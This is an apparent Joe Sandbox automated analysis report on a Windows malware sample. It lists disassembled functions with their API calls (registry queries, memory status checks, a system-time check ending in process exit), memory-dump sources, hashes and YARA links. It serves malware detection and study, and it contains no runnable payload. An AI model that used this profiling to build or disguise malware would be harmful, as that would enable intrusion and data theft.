                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: ac2274580579ae24cf1bca38e1d88c99f14d0cbe36e584ebc7d88969cf13ab13
                                • Instruction ID: d0f03dbae4ce9660a4acb521ffe869892a9d4d92987b435672f8b50c99dea69d
                                • Opcode Fuzzy Hash: ac2274580579ae24cf1bca38e1d88c99f14d0cbe36e584ebc7d88969cf13ab13
                                • Instruction Fuzzy Hash: B1111F71601209AFDB10EF69DD84EAB776DFB05744F20426AF91596280EB709D40CB70
                                Function 006C5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5B14
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006C5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 006C5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 006C5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: fb29532ee2517c8e79199d0b7b9689867ef1c0e503a2d7e11f8f056be9da22b2
                                • Instruction ID: 749eefeacd8278c6e2686c2f33959f14d1ca572b5909c717c32f5924c7d80cf8
                                • Opcode Fuzzy Hash: fb29532ee2517c8e79199d0b7b9689867ef1c0e503a2d7e11f8f056be9da22b2
                                • Instruction Fuzzy Hash: 64414F71B005199FCB08DF68CD95ABEBBA6EB88310F15826DE91AE7344D630AD418B90
                                Function 006B7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D58
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1D5
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: a118a7f0045c642674dde3451d314de9d2eeef8104b183a2476f01ea484444f5
                                • Instruction ID: fd91a81b2608af89785656b03720bfdf60c2790a5d23ca3bd0fb36d82013dfbd
                                • Opcode Fuzzy Hash: a118a7f0045c642674dde3451d314de9d2eeef8104b183a2476f01ea484444f5
                                • Instruction Fuzzy Hash: 0921D5713082044BD720DE6CD880ABAB7E7EFE1790B244A6EE442CB741D770DC818765
                                Function 006C33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 006C3411
                                • wsprintfA.USER32 ref: 006C3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 66bc35d0a0829a74b3182bc1d05d08a572030edb1dfad1e4ac5a9e4286800b84
                                • Instruction ID: 71719cca5a9ed54fc4b82483531287cda0a6d2451833270a777608ad939c4ecf
                                • Opcode Fuzzy Hash: 66bc35d0a0829a74b3182bc1d05d08a572030edb1dfad1e4ac5a9e4286800b84
                                • Instruction Fuzzy Hash: E101B5B1A04618ABDB04DF98DD49FBEB7B9FB44710F00422EF906E7380DB745D0086A5
                                Function 006BD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0133D980,00000000,00020119,?), ref: 006BD7F5
                                • RegQueryValueExA.ADVAPI32(?,0133EE60,00000000,00000000,00000000,000000FF), ref: 006BD819
                                • RegCloseKey.ADVAPI32(?), ref: 006BD823
                                • lstrcat.KERNEL32(?,00000000), ref: 006BD848
                                • lstrcat.KERNEL32(?,0133EE18), ref: 006BD85C
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 6ff096ad29c15193d37359863fad50c2bb989c66e4b86a84037bdf2679a53f75
                                • Instruction ID: d5f8c2b36b1967eac90414928bb847cd2fc6e961d5fe22f541407ee5e001cd2d
                                • Opcode Fuzzy Hash: 6ff096ad29c15193d37359863fad50c2bb989c66e4b86a84037bdf2679a53f75
                                • Instruction Fuzzy Hash: 234163B5A1010DAFCBA4FF68EC92FDD77B5BB44304F004169B60997251EE30AE858F95
                                Function 006B7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B7F60
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B7FA5
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B7FD3
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B8007
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: e9797b4d212494464ea4141e7eb778adac162d934fe88e5e633890d047ef1135
                                • Instruction ID: 05a45d613a06e2dced8fb46b3fcf2b2551d01da095ff98f910e9793169aa813c
                                • Opcode Fuzzy Hash: e9797b4d212494464ea4141e7eb778adac162d934fe88e5e633890d047ef1135
                                • Instruction Fuzzy Hash: 9F4190B0504116DFCB20DF58D484EEE77B9FF94340B110199E806AB351DB70EA96CB95
                                Function 006B8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B80EA
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B8102
                                • lstrlen.KERNEL32(00000000), ref: 006B8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B816F
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 3b9d74ea0f21dd9e6eca773fc1a0d6e99e6ddb0bdbeb7171b7839ec420a03dfc
                                • Instruction ID: e512690746ed99c6a7c25257edeb91d5807f34d75b2a83d8bbf4b083b2071aa4
                                • Opcode Fuzzy Hash: 3b9d74ea0f21dd9e6eca773fc1a0d6e99e6ddb0bdbeb7171b7839ec420a03dfc
                                • Instruction Fuzzy Hash: A8416BB5601107AFCB21EF6CD948BEABBBAAF44740F10855DA84997214EE34DD86CB90
                                Function 006C1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 006C1B72
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C184F
                                  • Part of subcall function 006C1820: lstrlen.KERNEL32(01326C00), ref: 006C1860
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C1887
                                  • Part of subcall function 006C1820: lstrcat.KERNEL32(00000000,00000000), ref: 006C1892
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C18C1
                                  • Part of subcall function 006C1820: lstrlen.KERNEL32(006D4FA0), ref: 006C18D3
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C18F4
                                  • Part of subcall function 006C1820: lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C1900
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C192F
                                • sscanf.NTDLL ref: 006C1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006C1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006C1BC6
                                • ExitProcess.KERNEL32 ref: 006C1BE3
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: fad48690a1a0016950f448027e561775919e98371822319fd8ac66d5dd9e93e1
                                • Instruction ID: bbfd28a0f7408124c06efe65adcedbe75bc6d29a2e9ef1364a3970a2830f29b6
                                • Opcode Fuzzy Hash: fad48690a1a0016950f448027e561775919e98371822319fd8ac66d5dd9e93e1
                                • Instruction Fuzzy Hash: F121E6B1518301AF8350EF65D88496BBBF9FFC9214F404A1EF599C3220E730DA048BA6
                                Function 006C3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C316D
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B820,00000000,00020119,?), ref: 006C318C
                                • RegQueryValueExA.ADVAPI32(?,0133DC00,00000000,00000000,00000000,000000FF), ref: 006C31A7
                                • RegCloseKey.ADVAPI32(?), ref: 006C31B1
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 3d2b513118a18f5d4a4cdf3d13958a048baec29ce50c4d681eef99f7e9e5cca3
                                • Instruction ID: e565cc00b96e6e99d2439b8e8f5e52d22b89f3284e6bef175f6348e91893faea
                                • Opcode Fuzzy Hash: 3d2b513118a18f5d4a4cdf3d13958a048baec29ce50c4d681eef99f7e9e5cca3
                                • Instruction Fuzzy Hash: 0F112E76A41215AFD710DB94ED45FAABBB9F744711F00422AFA0592680DB7559008BA1
                                Function 006C90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
